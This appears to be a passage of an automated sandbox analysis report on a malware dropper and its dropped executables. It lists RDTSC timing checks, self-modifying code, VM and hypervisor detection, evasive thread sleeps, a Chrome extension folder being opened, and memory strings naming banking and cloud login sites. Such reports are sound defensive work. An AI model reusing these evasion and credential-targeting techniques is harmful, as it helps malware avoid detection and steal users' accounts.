lea ebx, dword ptr [ebp+1244EC79h] 0x00000056 push 00000000h 0x00000058 push edi 0x00000059 call 00007F12C08324C8h 0x0000005e pop edi 0x0000005f mov dword ptr [esp+04h], edi 0x00000063 add dword ptr [esp+04h], 0000001Ah 0x0000006b inc edi 0x0000006c push edi 0x0000006d ret 0x0000006e pop edi 0x0000006f ret 0x00000070 or esi, 45757425h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 jmp 00007F12C08324D8h 0x0000007e rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 30A0A7 second address: 30A0B1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F12C15B731Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 30A13B second address: 30A146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 30A146 second address: 30A1D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F12C15B731Eh 0x0000000f mov eax, dword ptr [eax] 0x00000011 jp 00007F12C15B731Eh 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jmp 00007F12C15B7328h 0x00000020 pop eax 0x00000021 jmp 00007F12C15B7321h 0x00000026 push 00000003h 0x00000028 and di, BFB7h 0x0000002d push 00000000h 0x0000002f or dword ptr [ebp+122D1C75h], eax 0x00000035 push 00000003h 0x00000037 jne 00007F12C15B7316h 0x0000003d push B9F021A3h 0x00000042 pushad 0x00000043 jmp 00007F12C15B7325h 0x00000048 push ecx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 30A1D1 second address: 30A241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 add dword ptr [esp], 060FDE5Dh 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F12C08324C8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 jnp 00007F12C08324CCh 0x0000002d xor esi, dword ptr [ebp+122D3564h] 0x00000033 sbb edi, 5DBE0B4Ah 0x00000039 lea ebx, dword ptr [ebp+1244EC84h] 0x0000003f or dword ptr [ebp+122D1D62h], edx 0x00000045 xchg eax, ebx 0x00000046 jmp 00007F12C08324CAh 0x0000004b push eax 0x0000004c jng 00007F12C08324E5h 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F12C08324D3h 0x00000059 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F0EF49 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F0EFF3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 10B15AF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 10B18FD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F0C32A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 10C25FE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F0EF43 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 113CB2E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 18EF49 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 18EFF3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 3315AF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 3318FD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 18C32A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 3425FE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 18EF43 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 3BCB2E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Special instruction interceptor: First address: 6B7B56 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Special instruction interceptor: First address: 84C357 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Special instruction interceptor: First address: 8D3AA4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Special instruction interceptor: First address: 81FCA3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Special instruction interceptor: First address: 81FBAC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Special instruction interceptor: First address: A5C449 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Special instruction interceptor: First address: 5CC7C9 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Memory allocated: 51E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Memory allocated: 5430000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Memory allocated: 51E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Memory allocated: 4FF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Memory allocated: 54D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Memory allocated: 5240000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Memory allocated: 19E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Memory allocated: 3470000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Memory allocated: 32B0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04CD01A1 rdtsc

0_2_04CD01A1

Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1256	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1173	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1327	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1103	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1217	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1211	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1128	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window / User API: threadDelayed 1133	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window / User API: threadDelayed 1192	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window / User API: threadDelayed 1105	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window / User API: threadDelayed 1192	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window / User API: threadDelayed 1188	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window / User API: threadDelayed 1255
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window / User API: threadDelayed 1213
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window / User API: threadDelayed 1213
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window / User API: threadDelayed 1201
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window / User API: threadDelayed 1221
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window / User API: threadDelayed 1181
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window / User API: threadDelayed 1233
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window / User API: threadDelayed 351
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Window / User API: threadDelayed 481

Source: C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

API coverage: 1.6 %

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3796	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3796	Thread sleep time: -70035s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6236	Thread sleep count: 1256 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6236	Thread sleep time: -2513256s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6428	Thread sleep count: 264 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6428	Thread sleep time: -7920000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2404	Thread sleep count: 1173 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2404	Thread sleep time: -2347173s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6184	Thread sleep count: 1327 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6184	Thread sleep time: -2655327s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6192	Thread sleep count: 1103 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6192	Thread sleep time: -2207103s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3060	Thread sleep count: 1217 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3060	Thread sleep time: -2435217s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3576	Thread sleep count: 1211 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3576	Thread sleep time: -2423211s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2156	Thread sleep count: 1128 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2156	Thread sleep time: -2257128s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3576	Thread sleep time: -58029s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 5908	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 5752	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 400	Thread sleep count: 1133 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 400	Thread sleep time: -2267133s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 2324	Thread sleep count: 1192 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 2324	Thread sleep time: -2385192s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 3892	Thread sleep time: -44000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 6952	Thread sleep count: 1105 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 6952	Thread sleep time: -2211105s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 3320	Thread sleep count: 1192 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 3320	Thread sleep time: -2385192s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 6556	Thread sleep count: 1188 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 6556	Thread sleep time: -2377188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 7112	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 7112	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 7036	Thread sleep count: 1255 > 30
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 7036	Thread sleep time: -2511255s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 7080	Thread sleep count: 1213 > 30
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 7080	Thread sleep time: -2427213s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 368	Thread sleep count: 1213 > 30
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 368	Thread sleep time: -2427213s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 4560	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 1336	Thread sleep count: 1201 > 30
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 1336	Thread sleep time: -2403201s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 2896	Thread sleep count: 1221 > 30
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 2896	Thread sleep time: -2443221s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 4832	Thread sleep count: 1181 > 30
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 4832	Thread sleep time: -2363181s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 3152	Thread sleep count: 1233 > 30
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe TID: 3152	Thread sleep time: -2467233s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe TID: 7484	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 7784	Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 7788	Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 7788	Thread sleep time: -62031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 7760	Thread sleep time: -54027s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 7596	Thread sleep count: 351 > 30
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 7596	Thread sleep time: -2106000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 7776	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 7776	Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 7772	Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe TID: 7780	Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe TID: 6504	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe TID: 6456	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe TID: 7504	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

Code function: 9_2_61E354D1 sqlite3_os_init,GetSystemInfo,

9_2_61E354D1

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: skotes.exe, skotes.exe, 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmp, 1c8dd6ecf9.exe, 1c8dd6ecf9.exe, 00000008.00000002.3052757213.000000000082B000.00000040.00000001.01000000.00000009.sdmp, 6523f73121.exe, 6523f73121.exe, 00000009.00000002.3662876837.00000000009AC000.00000040.00000001.01000000.0000000A.sdmp, 1c8dd6ecf9.exe, 0000000A.00000002.3182062415.000000000082B000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 1c8dd6ecf9.exe, 0000000A.00000003.3178194377.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000002.3187229462.00000000010D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 1c8dd6ecf9.exe, 00000008.00000003.3052435278.00000000015F3000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 00000008.00000002.3053926843.00000000015F5000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 00000008.00000002.3053570593.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 00000008.00000003.3052530538.00000000015F4000.00000004.00000020.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3670040217.0000000000E93000.00000004.00000020.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000002.3187229462.0000000001118000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000003.3178194377.0000000001118000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509662544.00000000010B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 6523f73121.exe, 00000009.00000002.3690395511.000000000B6B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.000000000592B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 6523f73121.exe, 00000009.00000002.3690395511.000000000B6B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware'P
Source: 1c8dd6ecf9.exe, 00000008.00000003.3052435278.00000000015F3000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 00000008.00000002.3053926843.00000000015F5000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 00000008.00000003.3052530538.00000000015F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWS
